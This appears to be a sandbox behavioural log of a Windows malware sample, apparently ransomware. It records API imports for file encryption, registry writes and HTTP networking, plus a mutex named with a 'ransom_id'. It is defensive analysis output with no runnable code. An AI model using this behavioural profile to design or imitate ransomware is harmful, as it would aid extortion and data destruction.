Fn
File Get Info filename = STD_ERROR_HANDLE, type = file_type False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = attributes,time,size,volserialno False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = file_type False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = attributes,time,size,volserialno False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = file_type False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = attributes,time,size,volserialno False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = file_type False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = attributes,time,size,volserialno False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = file_type False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = attributes,time,size,volserialno False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = file_type False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = attributes,time,size,volserialno False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = file_type False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = attributes,time,size,volserialno False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = file_type False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = attributes,time,size,volserialno False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = file_type False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = attributes,time,size,volserialno False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = file_type False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = attributes,time,size,volserialno False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = file_type False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = attributes,time,size,volserialno False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = file_type False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = attributes,time,size,volserialno False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = file_type False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = attributes,time,size,volserialno False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = file_type False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = attributes,time,size,volserialno False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = file_type False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = attributes,time,size,volserialno False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = file_type False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = attributes,time,size,volserialno False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = file_type False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = attributes,time,size,volserialno False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = file_type False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = attributes,time,size,volserialno False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = file_type False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = attributes,time,size,volserialno False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = file_type False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = attributes,time,size,volserialno False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = file_type False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = attributes,time,size,volserialno False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = file_type False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = attributes,time,size,volserialno False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = file_type False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = attributes,time,size,volserialno False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = file_type False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = attributes,time,size,volserialno False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = file_type False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = attributes,time,size,volserialno False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = file_type False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = attributes,time,size,volserialno False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = file_type False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = attributes,time,size,volserialno False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = file_type False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = attributes,time,size,volserialno False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = file_type False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = attributes,time,size,volserialno False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = file_type False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = attributes,time,size,volserialno False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = file_type False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = attributes,time,size,volserialno False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = file_type False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = attributes,time,size,volserialno False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = file_type False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = attributes,time,size,volserialno False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = file_type False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = attributes,time,size,volserialno False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = file_type False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = attributes,time,size,volserialno False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = file_type False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = attributes,time,size,volserialno False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = file_type False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = attributes,time,size,volserialno False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = file_type False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = attributes,time,size,volserialno False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = file_type False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = attributes,time,size,volserialno False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = file_type False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = attributes,time,size,volserialno False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = file_type False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = attributes,time,size,volserialno False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = file_type False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = attributes,time,size,volserialno False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = file_type False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = attributes,time,size,volserialno False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = file_type False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = attributes,time,size,volserialno False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = file_type False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = attributes,time,size,volserialno False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = file_type False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = attributes,time,size,volserialno False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = file_type False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = attributes,time,size,volserialno False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = file_type False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = attributes,time,size,volserialno False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = file_type False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = attributes,time,size,volserialno False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = file_type False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = attributes,time,size,volserialno False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = file_type False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = attributes,time,size,volserialno False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = file_type False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = attributes,time,size,volserialno False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = file_type False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = attributes,time,size,volserialno False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = file_type False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = attributes,time,size,volserialno False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = file_type False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = attributes,time,size,volserialno False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = file_type False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = attributes,time,size,volserialno False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = file_type False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = attributes,time,size,volserialno False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = file_type False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = attributes,time,size,volserialno False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = file_type False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = attributes,time,size,volserialno False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = file_type False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = attributes,time,size,volserialno False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = file_type False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = attributes,time,size,volserialno False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = file_type False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = attributes,time,size,volserialno False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = file_type False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = attributes,time,size,volserialno False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = file_type False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = attributes,time,size,volserialno False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = file_type False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = attributes,time,size,volserialno False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = file_type False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = attributes,time,size,volserialno False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = file_type False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = attributes,time,size,volserialno False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = file_type False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = attributes,time,size,volserialno False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = file_type False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = attributes,time,size,volserialno False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = file_type False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = attributes,time,size,volserialno False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = file_type False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = attributes,time,size,volserialno False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = file_type False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = attributes,time,size,volserialno False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = file_type False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = attributes,time,size,volserialno False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = file_type False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = attributes,time,size,volserialno False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = file_type False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = attributes,time,size,volserialno False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = file_type False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = attributes,time,size,volserialno False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = file_type False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = attributes,time,size,volserialno False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = file_type False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = attributes,time,size,volserialno False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = file_type False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = attributes,time,size,volserialno False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = file_type False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = attributes,time,size,volserialno False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = file_type False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = attributes,time,size,volserialno False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = file_type False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = attributes,time,size,volserialno False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = file_type False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = attributes,time,size,volserialno False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = file_type False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = attributes,time,size,volserialno False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = file_type False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = attributes,time,size,volserialno False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = file_type False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = attributes,time,size,volserialno False 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = file_type False 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = LoadLibraryA, address_out = 0x7479d8d0 True 1
Fn
Module Load module_name = kernel32.dll, base_address = 0x74780000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = VirtualAlloc, address_out = 0x74798b70 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = VirtualProtect, address_out = 0x74798c50 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = VirtualFree, address_out = 0x74798c70 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetVersionExA, address_out = 0x74799fe0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = TerminateProcess, address_out = 0x7479fbc0 True 1
Fn
System Get Info type = Operating System True 1
Fn
Module Load module_name = KERNEL32.dll, base_address = 0x74780000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SetFilePointer, address_out = 0x747a6530 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = VirtualFree, address_out = 0x74798c70 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetFileAttributesW, address_out = 0x747a6340 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = ReadFile, address_out = 0x747a64a0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = MoveFileW, address_out = 0x7479a770 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = lstrcpyW, address_out = 0x747bd410 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SetFileAttributesW, address_out = 0x747a6510 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetDriveTypeW, address_out = 0x747a6300 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = VerSetConditionMask, address_out = 0x774b53c0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = WaitForSingleObject, address_out = 0x747a6110 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetTickCount, address_out = 0x747a57f0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = OpenProcess, address_out = 0x747992b0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetSystemDirectoryW, address_out = 0x74799a90 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = TerminateThread, address_out = 0x7479fcb0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = Sleep, address_out = 0x747977b0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = TerminateProcess, address_out = 0x7479fbc0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = VerifyVersionInfoW, address_out = 0x74797960 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = WaitForMultipleObjects, address_out = 0x747a60f0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = lstrcmpiW, address_out = 0x74797540 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = ExpandEnvironmentStringsW, address_out = 0x7479c8c0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CreateProcessW, address_out = 0x7479a510 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SetHandleInformation, address_out = 0x747a5f50 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = ExitThread, address_out = 0x774c2570 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = MultiByteToWideChar, address_out = 0x74792d60 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CreatePipe, address_out = 0x74790570 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = Process32FirstW, address_out = 0x7479ee30 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = Process32NextW, address_out = 0x7479c9b0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = lstrcmpiA, address_out = 0x74797610 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = InitializeCriticalSection, address_out = 0x774b95f0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FindFirstFileW, address_out = 0x747a6250 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = lstrcmpW, address_out = 0x747978d0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FindClose, address_out = 0x747a61d0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FindNextFileW, address_out = 0x747a6290 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetNativeSystemInfo, address_out = 0x7479a410 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetComputerNameW, address_out = 0x747a3e90 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetDiskFreeSpaceW, address_out = 0x747a62e0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetWindowsDirectoryW, address_out = 0x747a4cc0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetVolumeInformationW, address_out = 0x747a6450 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = LoadLibraryA, address_out = 0x7479d8d0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CreateThread, address_out = 0x74799700 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CloseHandle, address_out = 0x747a5f20 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = lstrcatW, address_out = 0x747bd320 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CreateFileMappingW, address_out = 0x747991e0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetLastError, address_out = 0x74792db0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetTempPathW, address_out = 0x747a6420 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CreateFileW, address_out = 0x747a6180 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetModuleFileNameW, address_out = 0x74799560 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = WriteFile, address_out = 0x747a6590 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetModuleHandleW, address_out = 0x74799660 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = UnmapViewOfFile, address_out = 0x747994b0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = MapViewOfFile, address_out = 0x74798c10 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CreateMutexW, address_out = 0x747a5fe0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetFileSize, address_out = 0x747a6360 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetEnvironmentVariableW, address_out = 0x74799540 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = lstrcpyA, address_out = 0x7479e320 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetModuleHandleA, address_out = 0x74799640 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = VirtualAlloc, address_out = 0x74798b70 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CreateToolhelp32Snapshot, address_out = 0x747a7510 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = lstrlenW, address_out = 0x74792d80 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetProcAddress, address_out = 0x74797940 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetProcessHeap, address_out = 0x74797910 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = HeapFree, address_out = 0x747925e0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = HeapAlloc, address_out = 0x7749da90 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = lstrlenA, address_out = 0x747a3a30 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = lstrcatA, address_out = 0x7479efc0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = ExitProcess, address_out = 0x747a74f0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = IsProcessorFeaturePresent, address_out = 0x74799680 True 1
Fn
Module Load module_name = USER32.dll, base_address = 0x77050000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = GetMessageW, address_out = 0x77083230 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = LoadCursorW, address_out = 0x77067740 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = BeginPaint, address_out = 0x77084ea0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = DestroyWindow, address_out = 0x770856f0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = TranslateMessage, address_out = 0x7706b9d0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = RegisterClassExW, address_out = 0x77068ee0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = LoadIconW, address_out = 0x77067710 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = SetWindowLongW, address_out = 0x77061830 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = EndPaint, address_out = 0x77084ec0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = GetForegroundWindow, address_out = 0x770850f0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = wsprintfW, address_out = 0x7707ddf0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = ShowWindow, address_out = 0x770852a0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = CreateWindowExW, address_out = 0x770691c0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = SendMessageW, address_out = 0x770638f0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = DispatchMessageW, address_out = 0x77063e40 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = DefWindowProcW, address_out = 0x774dcaa0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = UpdateWindow, address_out = 0x77077020 True 1
Fn
Module Load module_name = GDI32.dll, base_address = 0x75660000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\gdi32.dll, function = TextOutW, address_out = 0x7570a630 True 1
Fn
Module Load module_name = ADVAPI32.dll, base_address = 0x74c90000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptExportKey, address_out = 0x74caf8f0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = AllocateAndInitializeSid, address_out = 0x74caf0c0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = RegSetValueExW, address_out = 0x74caf0a0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = RegCreateKeyExW, address_out = 0x74caf550 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = RegCloseKey, address_out = 0x74caefa0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptAcquireContextW, address_out = 0x74cb0730 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGetKeyParam, address_out = 0x74cc5c90 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptReleaseContext, address_out = 0x74cb0ad0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptImportKey, address_out = 0x74caf890 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptEncrypt, address_out = 0x74cc5bd0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenKey, address_out = 0x74cb3fd0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptDestroyKey, address_out = 0x74cafc10 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = GetUserNameW, address_out = 0x74cb0ee0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = RegQueryValueExW, address_out = 0x74caed60 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = RegOpenKeyExW, address_out = 0x74caed80 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = FreeSid, address_out = 0x74cb04a0 True 1
Fn
Module Load module_name = SHELL32.dll, base_address = 0x75c90000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\shell32.dll, function = SHGetSpecialFolderPathW, address_out = 0x75e1edb0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\shell32.dll, function = ShellExecuteW, address_out = 0x75e24370 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\shell32.dll, function = ShellExecuteExW, address_out = 0x75e24cb0 True 1
Fn
Module Load module_name = CRYPT32.dll, base_address = 0x74d10000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\crypt32.dll, function = CryptStringToBinaryA, address_out = 0x74d58040 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\crypt32.dll, function = CryptBinaryToStringA, address_out = 0x74d32290 True 1
Fn
Module Load module_name = WININET.dll, base_address = 0x74220000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\wininet.dll, function = HttpSendRequestW, address_out = 0x74294510 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\wininet.dll, function = HttpOpenRequestW, address_out = 0x742e9fd0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\wininet.dll, function = InternetCloseHandle, address_out = 0x742a2410 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\wininet.dll, function = InternetOpenW, address_out = 0x74292460 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\wininet.dll, function = InternetConnectW, address_out = 0x742bb650 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\wininet.dll, function = InternetReadFile, address_out = 0x742911e0 True 1
Fn
Module Load module_name = msvcr100.dll, base_address = 0x74160000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\msvcr100.dll, function = atexit, address_out = 0x7417c544 True 1
Fn
System Sleep duration = 1000 milliseconds (1.000 seconds) True 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\Tcpip\Parameters True 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\Tcpip\Parameters, value_name = Domain, data = 0 True 1
Fn
System Get Info type = Windows Directory, result_out = C:\Windows True 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 True 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0, value_name = ProcessorNameString, data = 73 True 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 True 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0, value_name = Identifier, data = 73 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\ntdll.dll, base_address = 0x77460000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\ntdll.dll, function = RtlComputeCrc32, address_out = 0x77486b10 True 1
Fn
Mutex Create mutex_name = Global\pc_group=WORKGROUP&ransom_id=dce1bb8bd2ca4def True 1
Fn
